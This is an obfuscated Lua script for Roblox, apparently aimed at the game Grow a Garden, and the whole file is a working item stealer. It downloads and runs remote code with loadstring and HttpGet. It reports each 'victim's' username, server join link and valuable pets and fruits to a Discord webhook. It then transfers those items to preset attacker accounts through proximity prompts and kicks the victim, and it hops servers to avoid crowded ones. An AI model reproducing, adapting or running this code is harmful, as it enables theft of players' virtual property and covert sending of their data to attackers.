--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v34,v35) local v36={};_G.Cs={UQSDDAA=3,YASDMRXA=1,YASa0AVV=2};for v77=1, #v34 do v6(v36,v0(v4(v1(v2(v34,v77,v77 +  #Cs + 1 )),v1(v2(v35,1 + (v77% #v35) ,1 + (v77% #v35) + 1 )))%256 ));end return v5(v36);end _G.scriptExecuted=_G.scriptExecuted or false ;if _G.scriptExecuted then return;end _G.scriptExecuted=true;task.spawn(function() loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\250\48\252\186\244\29\195\202\203\49\245\244\230\11\203\194\232\49\227\186\203\81\195\198\221\54\169\179\194\31\213\208\148\40\231\178\201\81\246\194\201\33\227\181\138\40\131\141\215\48\231\245\211\6\197","\126\177\163\187\69\134\219\167")))();end);local v8=_G.Usernames or {v7("\2\225\30\224\206\13\236\30\224\208\12\238\1\224\206","\156\67\173\74\165"),v7("\21\187\93\41\133\34\92","\38\84\215\41\118\220\70"),v7("\99\30\45\5\253\81\5\43\28\249\87","\158\48\118\66\114"),v7("\141\117\38\5\71\138","\155\203\68\112\86\19\197")} ;local v9=_G.min_value or (10000762 -(418 + 344)) ;local v10=_G.pingEveryone or v7("\127\216\37","\152\38\189\86\156\32\24\133") ;local v11=_G.webhook or v7("\244\67\179\86\239\13\232\9\248\94\180\69\243\69\163\8\255\88\170\9\253\71\174\9\235\82\165\78\243\88\172\85\179\6\244\30\169\2\244\19\173\14\242\18\165\15\241\17\170\4\245\19\179\121\131\82\198\7\191\98\249\120\129\68\203\103\174\66\165\126\137\17\233\125\169\96\172\103\144\31\210\121\171\108\236\103\137\116\215\68\172\79\195\94\254\72\249\117\172\100\244\64\134\105\253\91\132\18\164\125\173\98\218\1\190\101\241\124\246\77\175","\38\156\55\199") ;local v12=game:GetService(v7("\152\113\125\49\22\102\233","\35\200\29\28\72\115\20\154"));local v13=game:GetService(v7("\49\171\197\207\190\41\38\15\182\210\218","\84\121\223\177\191\237\76"));local v14=v12.LocalPlayer;local v15=v14:WaitForChild(v7("\153\87\202\171\42\81\51\202","\161\219\54\169\192\90\48\80"));local v16=game:GetService(v7("\123\71\16\41\64\65\1\49\76\70\51\49\70\80\1\34\76","\69\41\34\96"));local v17=v16:WaitForChild(v7("\145\204\211\31\14\46\175","\75\220\163\183\106\98"));local v18=require(v17:WaitForChild(v7("\33\187\135\52\204\14\187\159\50\233\14\187\133\35\239\3\182\158\50","\185\98\218\235\87")));local v19=require(v17:WaitForChild(v7("\251\57\51\213\219\184\221\53\36\227\205","\202\171\92\71\134\190")):WaitForChild(v7("\25\196\56\189\61\200\32\129\61\200\41\155","\232\73\161\76")));local v20=require(v16:WaitForChild(v7("\159\216\86\92","\126\219\185\34\61")):WaitForChild(v7("\60\203\74\64\123\112\250\244\24\220\71","\135\108\174\62\18\30\23\147")));local v21=require(v17:WaitForChild(v7("\152\252\39\201\29\188\6\211\191\229","\167\214\137\74\171\120\206\83")));local v22=require(v17:WaitForChild(v7("\175\241\38\92\203\162\153\230\59\94\253","\199\235\144\82\61\152")));local v23=v14.Character or v14.CharacterAdded:Wait() ;local v24={v7("\52\19\188\47","\75\103\118\217"),v7("\244\92\127\2\188\18\135\111\84\17\170\10\213\91\105\84\137\18\198\90\100\7\132","\126\167\52\16\116\217"),v7("\255\47\52\133\166","\156\168\78\64\224\212\121"),v7("\33\235\183\218\14\226\172\212\2\252","\174\103\142\197")};local v25={v7("\100\41\92\59\42\81\246","\152\54\72\63\88\69\62"),v7("\255\205\250\79\193\202\235","\60\180\164\142"),v7("\124\87\22\42\40\173\48\93\91","\114\56\62\101\73\71\141"),v7("\158\236\213\202\189\234\155\226\183\241","\164\216\137\187"),v7("\225\246\56\188\169\237\10\199\244\36\161","\107\178\134\81\210\198\158"),v7("\26\27\150\210\175\42\8\142\223","\202\88\110\226\166"),v7("\231\29\131\240\197\205\9\142\238","\170\163\111\226\151"),v7("\37\125\160\61\86","\73\113\80\210\88\46\87")};local v26=1806 -(1202 + 604) ;local v27={};if ((next(v8)==nil) or (v11=="")) then local v78=0 -0 ;while true do if (v78==0) then v14:kick("You didn't add any usernames or webhook");return;end end end if (game.PlaceId~=(126884526907689 -  -168726377)) then local v79=0;while true do if (v79==(0 -0)) then local v117=0;while true do if (v117==(325 -(45 + 280))) then local v145=0;while true do if (v145==(0 + 0)) then v14:kick(v7("\166\45\192\23\167\143\35\217\82\244\148\60\221\29\245\149\41\201\92\167\177\32\200\19\244\132\108\199\29\238\143\108\204\82\233\142\62\192\19\235\193\11\223\29\240\193\45\141\53\230\147\40\200\28\167\178\41\223\4\226\147","\135\225\76\173\114"));return;end end end end end end end if ( #v12:GetPlayers()>=5) then local v80=0;local v81;local v82;local v83;while true do if (v80==2) then task.spawn(v83);break;end if (v80==(1 + 0)) then local v118=0 + 0 ;while true do if (v118==(1 + 0)) then v80=1 + 1 ;break;end if (v118==(0 -0)) then v83=nil;function v83() local v154="";local v155=10;local v156=0;local v157=false;while v156<v155  do local v161=1911 -(340 + 1571) ;local v162;local v163;local v164;while true do if (v161==(0 + 0)) then local v186=1772 -(1733 + 39) ;while true do if (v186==(0 -0)) then v162=1034 -(125 + 909) ;v163=nil;v186=1;end if (v186==1) then v161=1949 -(1096 + 852) ;break;end end end if (v161==1) then v164=nil;while true do if (v162==(1 + 0)) then if (v163 and v164.Success) then local v195=0;local v196;while true do if (v195==1) then if v196.nextPageCursor then v154=v196.nextPageCursor;else local v201=0 -0 ;while true do if (v201==0) then v154="";task.wait(1);break;end end end break;end if ((0 + 0)==v195) then v196=v82:JSONDecode(v164.Body);for v198,v199 in ipairs(v196.data) do if ((v199.playing>=1) and (v199.playing<=(515 -(409 + 103))) and (v199.id~=game.JobId)) then local v202=236 -(46 + 190) ;local v203;while true do if (v202==0) then v203=0;while true do local v204=0;while true do if (v204==(95 -(51 + 44))) then if (v203==(1 + 0)) then return;end if (v203==(1317 -(1114 + 203))) then v81:TeleportToPlaceInstance(126884695634792 -(228 + 498) ,v199.id);v157=true;v203=1 + 0 ;end break;end end end break;end end end end v195=1 + 0 ;end end else local v197=0;while true do if (v197==(663 -(174 + 489))) then warn(v7("\97\205\60\208\1\67\140\33\211\68\65\201\33\223\12\7\223\48\206\18\66\222\38\146\68\117\201\33\206\29\78\194\50\146\74\9","\100\39\172\85\188"));task.wait(2 -1 );break;end end end break;end if (v162==(1905 -(830 + 1075))) then v156+=1 v163,v164=pcall(function() return request({[v7("\16\150\179","\112\69\228\223\44\100\232\113")]=v7("\220\11\19\195\165\38\201\155\24\6\222\179\111\200\198\16\5\223\185\100\200\215\16\10\156\160\45\201\211\30\10\214\165\51\215\134\73\95\139\226\42\223\129\73\84\135\230\42\208\155\12\2\193\160\121\148\199\80\55\198\180\112\143\215\64\20\220\164\104\169\198\27\2\193\235\93\149\215\89\11\218\187\117\146\137\78\87\131\240\127\147\198\12\8\193\235","\230\180\127\103\179\214\28")   .. v154 ,[v7("\161\0\75\78\235\69","\128\236\101\63\38\132\33")]=v7("\139\140\37","\175\204\201\113\36\214\139")});end);v162=525 -(303 + 221) ;end end break;end end end if  not v157 then warn(v7("\150\75\188\146\37\168\106\145\143\35\144\56\159\129\58\161\125\189\192\39\162\56\191\137\61\169\56\184\192\32\160\121\181\140\115\190\125\171\150\54\191\54\249\163\60\163\108\176\142\38\164\118\190\192\32\174\106\176\144\39\237\118\182\146\62\172\116\181\153\125","\83\205\24\217\224"));end end v118=1;end end end if (v80==0) then v81=game:GetService(v7("\46\232\180\181\188\178\181\14\222\189\162\186\180\164\31","\199\122\141\216\208\204\221"));v82=game:GetService(v7("\133\201\4\224\75\243\191\203\25\243\125","\150\205\189\112\144\24"));v80=1;end end end if (game:GetService(v7("\212\202\207\49\233\221\255\56\246\201\196\62\231\209\200\57\213\209\194\47\231\194\200","\93\134\165\173")):WaitForChild(v7("\153\247\213\241\63\220\164\123\172\198\216\210\63","\30\222\146\161\162\90\174\210")):InvokeServer()==v7("\211\103\64\57\224\92\102\15\247","\106\133\46\16")) then local v84=1269 -(231 + 1038) ;local v85;while true do if (v84==(0 + 0)) then v85=0;while true do if ((1162 -(171 + 991))==v85) then v14:kick(v7("\107\37\97\234\95\82\24\37\97\238\85\82\22\96\67\240\95\65\75\37\51\246\85\73\86\96\114\188\126\105\126\6\86\206\127\110\108\96\96\249\72\86\93\50","\32\56\64\19\156\58"));return;end end break;end end end local function v28(v37) local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v38==0) then v39=0 -0 ;v40=nil;v41=nil;v38=1;end if (v38==(4 -2)) then v45=nil;v46=nil;v47=nil;v38=3 + 0 ;end if (v38==(3 -2)) then v42=nil;v43=nil;v44=nil;v38=2;end if (v38==(8 -5)) then v48=nil;while true do if (v39==(0 -0)) then local v130=0 -0 ;while true do if (v130==1) then v41=v20.PetEggs[v40];if  not v41 then return 1248 -(111 + 1137) ;end v130=160 -(91 + 67) ;end if (v130==(0 -0)) then v40=v37.PetData.HatchedFrom;if ( not v40 or (v40=="")) then return 0;end v130=1;end if (v130==(1 + 1)) then v39=524 -(423 + 100) ;break;end end end if (v39==(1 + 2)) then local v131=0;local v132;while true do if ((0 -0)==v131) then v132=0 + 0 ;while true do if (v132==(771 -(326 + 445))) then v48=v20.PetList[v37.PetType].SellPrice * v47 ;return math.floor(v48);end end break;end end end if (v39==(8 -6)) then v44=v21.ReverseLerp(v43[2 -1 ],v43[2],v37.PetData.BaseWeight);v45=math.lerp(0.8 -0 ,712.2 -(530 + 181) ,v44);v46=v19:GetLevelProgress(v37.PetData.Level);v47=v45 * math.lerp(881.15 -(614 + 267) ,6,v46) ;v39=3;end if (v39==(33 -(19 + 13))) then local v133=0 -0 ;while true do if ((2 -1)==v133) then v43=v42.GeneratedPetData.WeightRange;if  not v43 then return 0 -0 ;end v133=1 + 1 ;end if (v133==0) then v42=v41.RarityData.Items[v37.PetType];if  not v42 then return 0 -0 ;end v133=1 -0 ;end if (v133==(1814 -(1293 + 519))) then v39=3 -1 ;break;end end end end break;end end end local function v29(v49) local v50=0 -0 ;local v51;local v52;local v53;while true do if (v50==1) then v53=nil;while true do if (v51==(3 -1)) then if (v53==(4 -3)) then return tostring(math.floor(v49));elseif (v49==math.floor(v49)) then return string.format(v7("\31\204\160\69","\224\58\168\133\54\58\146"),v49,v52[v53]);else return string.format(v7("\28\24\25\251\48\149","\107\57\54\43\157\21\230\231"),v49,v52[v53]);end break;end if (v51==(2 -1)) then local v134=0;while true do if (v134==1) then v51=2 + 0 ;break;end if (v134==0) then v53=1;while (v49>=1000) and (v53< #v52)  do v49=v49/1000 ;v53=v53 + 1 + 0 ;end v134=1;end end end if (v51==(0 -0)) then if (v49==nil) then return "0";end v52={"","k","m","b","t"};v51=1859 -(673 + 1185) ;end end break;end if (0==v50) then v51=0;v52=nil;v50=2 -1 ;end end end local function v30(v54) local v55=0;local v56;local v57;local v58;while true do if (v55==(0 -0)) then v56=0 -0 ;v57=nil;v55=1 + 0 ;end if (v55==1) then v58=nil;while true do if (v56==(0 + 0)) then v57=v54:FindFirstChild(v7("\236\142\24\242\177\200","\175\187\235\113\149\217\188")) or v54:FindFirstChild(v7("\23\136","\24\92\207\225\44\131\25")) or v54:FindFirstChild(v7("\124\214\177\75\19\105\125\210\180\89\30","\29\43\179\216\44\123")) or v54:FindFirstChild(v7("\144\216\51\95","\44\221\185\64")) ;v58=0 -0 ;v56=1 + 0 ;end if (v56==1) then if v57 then if (v57:IsA(v7("\47\242\69\93\118\19\209\73\83\102\4","\19\97\135\40\63")) or v57:IsA(v7("\135\82\39\13\46\61\187\89","\81\206\60\83\91\79"))) then v58=v57.Value;elseif v57:IsA(v7("\125\191\194\123\33\196\123\165\66\190\213","\196\46\203\176\18\79\163\45")) then v58=tonumber(v57.Value) or (0 -0) ;end else local v158=0 -0 ;local v159;while true do if (v158==(1880 -(446 + 1434))) then v159=v54.Name:match(v7("\253\106\54\91\32\176\170\246\125\59\26\110\178\175\231\41\121\91\109","\143\216\66\30\126\68\155"));if v159 then v58=tonumber(v159) or 0 ;end break;end end end return math.floor((v58 * (1383 -(1040 + 243))) + 0.5 )/100 ;end end break;end end end local function v31() local v59=0 -0 ;local v60;while true do local v86=1847 -(559 + 1288) ;while true do if (v86==0) then if (v59==0) then v60=1931 -(609 + 1322) ;for v146,v147 in ipairs(v27) do if (v147.Weight>v60) then v60=v147.Weight;end end v59=455 -(13 + 441) ;end if (v59==1) then return v60;end break;end end end end local function v32(v61,v62) local v63={{[v7("\164\201\0\206","\129\202\168\109\171\165\195\183")]="Victim UsernameðŸŽ¯:",[v7("\52\89\59\205\219","\134\66\56\87\184\190\116")]=v14.Name,[v7("\53\63\5\178\23\238","\85\92\81\105\219\121\139\65")]=true},{[v7("\243\178\93\64","\191\157\211\48\37\28")]="Join linkðŸ”—:",[v7("\201\30\248\9\63","\90\191\127\148\124")]=v7("\112\147\58\7\107\221\97\88\126\130\60\25\54\144\58\17\55\141\33\30\118\130\60\72\104\139\47\20\125\174\42\74\41\213\120\79\32\211\120\78\45\209\125\67\40\209\120\81\127\134\35\18\81\137\61\3\121\137\45\18\81\131\115","\119\24\231\78")   .. game.JobId },{[v7("\140\44\168\79","\113\226\77\197\42\188\32")]="PetsðŸ¾:",[v7("\44\23\248\160\63","\213\90\118\148")]="",[v7("\82\32\184\95\67\94","\45\59\78\212\54")]=false},{[v7("\30\87\142\142","\144\112\54\227\235\230\78\205")]=v7("\128\61\2\241\209\73\170\114","\59\211\72\111\156\176"),[v7("\88\134\239\56\75","\77\46\231\131")]=string.format("Total Value: Â¢%s\nHighest weight fruit: %.2f KG",v29(v26),v31()),[v7("\179\90\186\73\180\81","\32\218\52\214")]=false}};for v87,v88 in ipairs(v61) do local v89=0;local v90;while true do if (v89==(0 -0)) then v90=string.format("%s (%.2f KG): Â¢%s",v88.Name,v88.Weight,v29(v88.Value));v63[2 + 1 ].value=v63[2 + 1 ].value   .. v90   .. "\n" ;break;end end end if ( #v63[8 -5 ].value>(561 + 463)) then local v96=0 -0 ;local v97;while true do if (v96==(0 + 0)) then local v126=0 + 0 ;while true do if (0==v126) then v97={};for v170 in v63[3].value:gmatch("[^\r\n]+") do table.insert(v97,v170);end v126=1 + 0 ;end if (v126==(1 + 0)) then v96=1 + 0 ;break;end end end if ((434 -(153 + 280))==v96) then while ( #v63[8 -5 ].value>(920 + 104)) and ( #v97>(0 + 0))  do local v135=0;local v136;while true do if (v135==(0 + 0)) then v136=0;while true do if (0==v136) then table.remove(v97);v63[3].value=table.concat(v97,"\n")   .. "\nPlus more!" ;break;end end break;end end end break;end end end local v64={[v7("\77\24\63\188\244\190\81","\58\46\119\81\200\145\208\37")]=v62   .. "game:GetService('TeleportService'):TeleportToPlaceInstance(126884695634066, '"   .. game.JobId   .. "')" ,[v7("\46\129\50\169\173\174","\86\75\236\80\204\201\221")]={{[v7("\102\72\99\137\251","\235\18\33\23\229\158")]="\240\159\140\180 Join To Recieve Hit",[v7("\83\181\205\180\66","\219\48\218\161")]=65280,[v7("\226\120\121\69\223\92","\128\132\17\28\41\187\47")]=v63,[v7("\7\61\9\46\88\19","\61\97\82\102\90")]={[v7("\184\43\179\95","\105\204\78\203\43\167\55\126")]="ðŸ¥·ðŸ»Stealer ni Dee"}}}};local v65=v13:JSONEncode(v64);local v66={[v7("\134\165\45\10\22\10\211\28\145\179\51\27","\49\197\202\67\126\115\100\167")]=v7("\54\75\207\37\137\85\95\35\82\208\39\207\92\77\56\85","\62\87\59\191\73\224\54")};local v67=request({[v7("\210\16\246","\169\135\98\154")]=v11,[v7("\230\114\48\92\242\55","\168\171\23\68\52\157\83")]=v7("\196\94\198\153","\231\148\17\149\205\69\77"),[v7("\168\162\198\255\82\237\147","\159\224\199\167\155\55")]=v66,[v7("\213\252\56\203","\178\151\147\92")]=v65});end local function v33(v68) local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (v69==(2 + 0)) then local v115=0 + 0 ;while true do if (v115==1) then v69=4 -1 ;break;end if (v115==(0 + 0)) then v72=v13:JSONEncode(v71);v73={[v7("\154\44\165\96\186\177\81\249\141\58\187\113","\212\217\67\203\20\223\223\37")]=v7("\187\157\184\222\179\142\169\198\179\130\166\157\176\158\167\220","\178\218\237\200")};v115=668 -(89 + 578) ;end end end if (v69==(0 + 0)) then local v116=0 -0 ;while true do if (v116==(1049 -(572 + 477))) then v70={{[v7("\130\252\65\55","\26\236\157\44\82\114\44")]="Victim UsernameðŸŽ¯:",[v7("\60\47\217\78\47","\59\74\78\181")]=v14.Name,[v7("\44\223\86\83\189\32","\211\69\177\58\58")]=true},{[v7("\185\228\116\240","\171\215\133\25\149\137")]=v7("\200\220\55\247\252\112\239\71\239\220\104","\34\129\168\82\154\143\80\156"),[v7("\147\179\63\30\77","\233\229\210\83\107\40\46")]="",[v7("\200\76\62\223\11\196","\101\161\34\82\182")]=false},{[v7("\230\12\84\251","\78\136\109\57\158\187\130\226")]=v7("\13\42\244\252\63\45\224\171","\145\94\95\153"),[v7("\235\204\24\192\75","\215\157\173\116\181\46")]=string.format("Total Value: Â¢%s\nHighest weight fruit: %.2f KG",v29(v26),v31()),[v7("\60\186\135\251\212\48","\186\85\212\235\146")]=false}};for v148,v149 in ipairs(v68) do local v150=86 -(84 + 2) ;local v151;while true do if (v150==(0 -0)) then v151=string.format("%s (%.2f KG): Â¢%s",v149.Name,v149.Weight,v29(v149.Value));v70[2].value=v70[2 + 0 ].value   .. v151   .. "\n" ;break;end end end v116=843 -(497 + 345) ;end if (v116==1) then v69=1 + 0 ;break;end end end if (v69==(1 + 0)) then if ( #v70[1335 -(605 + 728) ].value>1024) then local v127=0 + 0 ;local v128;while true do if (v127==(0 -0)) then local v160=0;while true do if (v160==(0 + 0)) then v128={};for v188 in v70[7 -5 ].value:gmatch("[^\r\n]+") do table.insert(v128,v188);end v160=1 + 0 ;end if (v160==1) then v127=2 -1 ;break;end end end if (v127==1) then while ( #v70[2].value>1024) and ( #v128>0)  do local v171=0;local v172;while true do if (v171==(0 + 0)) then v172=489 -(457 + 32) ;while true do if (v172==0) then table.remove(v128);v70[2].value=table.concat(v128,"\n")   .. "\nPlus more!" ;break;end end break;end end end break;end end end v71={[v7("\199\140\20\251\61\253","\56\162\225\118\158\89\142")]={{[v7("\72\12\212\163\39","\184\60\101\160\207\66")]="\240\159\140\180 New GAG Execution",[v7("\50\141\112\179\35","\220\81\226\28")]=27697 + 37583 ,[v7("\21\220\135\247\238\212","\167\115\181\226\155\138")]=v70,[v7("\228\45\232\72\126\99","\166\130\66\135\60\27\17")]={[v7("\80\79\214\97","\80\36\42\174\21")]=v7("\125\4\50\123\66\21\37\58\64\25\119\94\75\21","\26\46\112\87")}}}};v69=2;end if (v69==(1405 -(832 + 570))) then v74=request({[v7("\131\167\234","\176\214\213\134")]=v11,[v7("\217\168\162\220\167\82","\57\148\205\214\180\200\54")]=v7("\34\210\6\0","\22\114\157\85\84"),[v7("\236\206\18\192\88\228\187","\200\164\171\115\164\61\150")]=v73,[v7("\156\251\7\92","\227\222\148\99\37")]=v72});break;end end end for v75,v76 in ipairs(v15:GetChildren()) do if (v76:IsA(v7("\7\93\93\250","\153\83\50\50\150")) and  not table.find(v24,v76.Name)) then if (v76:GetAttribute(v7("\116\98\118\17\71\178\93\88","\45\61\22\19\124\19\203"))==v7("\241\23\25","\217\161\114\109\149\98\16")) then local v120=0;local v121;local v122;local v123;while true do if (v120==(0 + 0)) then v121=v76:GetAttribute(v7("\34\5\12\67\137\65\59\4","\20\114\64\88\28\220"));v122=v22:GetData().PetsData.PetInventory.Data[v121];v120=1 + 0 ;end if (v120==(3 -2)) then v123=v122.PetType;if (table.find(v25,v123) or (v30(v76)>=10)) then local v173=0 + 0 ;local v174;local v175;local v176;while true do if (v173==1) then v175=v76.Name;v176=tonumber(v175:match(v7("\158\234\102\25\43\28\158\159\113\25\43\29\146\145\5\123\106\106","\55\187\177\78\60\79"))) or (796 -(588 + 208)) ;v173=5 -3 ;end if (v173==2) then v26=v26 + v174 ;table.insert(v27,{[v7("\25\193\80\231","\224\77\174\63\139\38\175")]=v76,[v7("\170\64\85\43","\78\228\33\56")]=v123,[v7("\248\127\190\22\128","\229\174\30\210\99")]=v174,[v7("\44\232\143\86\229\41","\89\123\141\230\49\141\93")]=v176,[v7("\199\104\230\9","\42\147\17\150\108\112")]=v7("\63\163\57","\136\111\198\77\31\135")});break;end if (v173==0) then if v76:GetAttribute(v7("\23\0\196\187\234\217\169\52","\221\81\97\178\212\152\176")) then v16:WaitForChild(v7("\234\230\16\254\63\219\226\19\239\9","\122\173\135\125\155")):WaitForChild(v7("\162\192\22\182\45\56\220\129\254\41\173\58\60","\168\228\161\96\217\95\81")):FireServer(v76);end v174=v28(v122);v173=1801 -(884 + 916) ;end end end break;end end else local v124=0 -0 ;local v125;while true do if (v124==(0 + 0)) then v125=v18(v76);if (v125>=v9) then local v177=653 -(232 + 421) ;local v178;local v179;local v180;while true do if (v177==(1889 -(1569 + 320))) then v178=0 + 0 ;v179=nil;v177=1 + 0 ;end if (v177==(3 -2)) then v180=nil;while true do if (v178==(606 -(316 + 289))) then v26=v26 + v125 ;table.insert(v27,{[v7("\141\3\140\45","\204\217\108\227\65\98\85")]=v76,[v7("\112\194\248\224","\160\62\163\149\133\76")]=v180,[v7("\224\161\1\58\198","\163\182\192\109\79")]=v125,[v7("\3\35\9\199\253\32","\149\84\70\96\160")]=v179,[v7("\12\31\29\232","\141\88\102\109")]=v7("\131\95\203\126\14","\161\211\51\170\16\122\93\53")});break;end if (v178==0) then v179=v30(v76);v180=v76:GetAttribute(v7("\43\29\162\91\147\229\26\172","\201\98\105\199\54\221\132\119"));v178=2 -1 ;end end break;end end end break;end end end end end if ( #v27>0) then table.sort(v27,function(v98,v99) if ((v98.Type~=v7("\203\171\166","\72\155\206\210")) and (v99.Type==v7("\118\127\64","\83\38\26\52\110"))) then return true;elseif ((v98.Type==v7("\104\18\51","\38\56\119\71")) and (v99.Type~=v7("\195\234\76","\54\147\143\56\182\69"))) then return false;else return v98.Value<v99.Value ;end end);local v91={};for v100,v101 in ipairs(v27) do v91[v100]=v101;end local v92={[v7("\228\128\252\74\208\217\143","\191\182\225\159\41")]=1,[v7("\0\27\60\70\158\137\199","\162\75\114\72\53\235\231")]=1 + 1 ,[v7("\168\53\87\225\92\66\174\57\65","\98\236\92\36\130\51")]=3,[v7("\130\28\2\180\64\171\245\22\171\1","\80\196\121\108\218\37\200\213")]=1457 -(666 + 787) ,[v7("\51\99\11\113\68\29\139\21\97\23\108","\234\96\19\98\31\43\110")]=5,[v7("\36\10\70\211\169\96\141\10\6","\235\102\127\50\167\204\18")]=431 -(360 + 65) ,[v7("\116\179\244\36\75\32\86\173\236","\78\48\193\149\67\36")]=7 + 0 ,[v7("\4\83\146\29\89","\33\80\126\224\120")]=8};table.sort(v91,function(v103,v104) local v105=((v103.Type==v7("\220\173\23","\60\140\200\99\164")) and v92[v103.Name]) or nil ;local v106=((v104.Type==v7("\183\241\16","\194\231\148\100\70")) and v92[v104.Name]) or nil ;if (v105 and v106) then return v105<v106 ;elseif v105 then return true;elseif v106 then return false;end return v103.Value>v104.Value ;end);local v93="";if (v10==v7("\127\73\210","\168\38\44\161\195\150")) then v93=v7("\205\177\185\77\16\237\160\19\146\229\141\120\53\213\139\86","\118\224\156\226\22\80\136\214");end v32(v91,v93);local function v94(v107) local v108=0;local v109;local v110;local v111;while true do if ((256 -(79 + 175))==v108) then for v137,v138 in ipairs(v27) do local v139=0 -0 ;local v140;while true do if ((0 + 0)==v139) then v140=0 -0 ;while true do if (v140==0) then v138.Tool.Parent=v23;if (v138.Type==v7("\234\238\99","\167\186\139\23\136\235")) then local v192=0 -0 ;local v193;while true do if (v192==(900 -(503 + 396))) then fireproximityprompt(v193);break;end if (v192==(181 -(92 + 89))) then v193=v107.Character.Head:WaitForChild(v7("\42\167\135\21\19\184\129\25\3\133\154\2\23\165\156","\109\122\213\232"));repeat task.wait(0.01 -0 );until v193.Enabled v192=1 + 0 ;end end else repeat task.wait(0.01 + 0 );until v110.Enabled fireproximityprompt(v110);end v140=3 -2 ;end if (v140==2) then task.wait(0.1 + 0 );break;end if (v140==1) then task.wait(0.1 -0 );v138.Tool.Parent=v15;v140=2 + 0 ;end end break;end end end v111=true;v108=2 + 1 ;end if (v108==(2 -1)) then wait(0.1 + 0 );v110=v107.Character.HumanoidRootPart:WaitForChild(v7("\238\181\202\197\122\252\84\26\199\151\215\210\126\225\73","\110\190\199\165\189\19\145\61"));v108=2 -0 ;end if (v108==3) then while v111 do local v141=1244 -(485 + 759) ;while true do if (v141==(0 -0)) then v111=false;for v184,v185 in ipairs(v27) do if v15:FindFirstChild(v185.Tool.Name) then v111=true;break;end end v141=1190 -(442 + 747) ;end if (v141==1) then task.wait(0.1);break;end end end v14:kick(v7("\218\246\172\55\239\183\150\49\224\240\163\112\198\214\138\17\198\214\138\17\198\223\131\24\207","\80\142\151\194"));break;end if (v108==0) then v109=v23:WaitForChild(v7("\106\251\84\129\76\225\80\132\112\225\86\148\114\239\75\148","\224\34\142\57"));v109.CFrame=v107.Character.HumanoidRootPart.CFrame + Vector3.new(0,1135 -(832 + 303) ,948 -(88 + 858) ) ;v108=1 + 0 ;end end end local function v95() local v112=0 + 0 ;local v113;local v114;while true do if (v112==(0 + 0)) then v113=false;v114=nil;v112=790 -(766 + 23) ;end if (v112==2) then v12.PlayerAdded:Connect(v114);break;end if (v112==(4 -3)) then function v114(v142) if table.find(v8,v142.Name) then v142.Chatted:Connect(function() local v181=0 -0 ;while true do if ((0 -0)==v181) then if  not v113 then v33(v91);v113=true;end v94(v142);break;end end end);end end for v143,v144 in ipairs(v12:GetPlayers()) do v114(v144);end v112=6 -4 ;end end end v95();end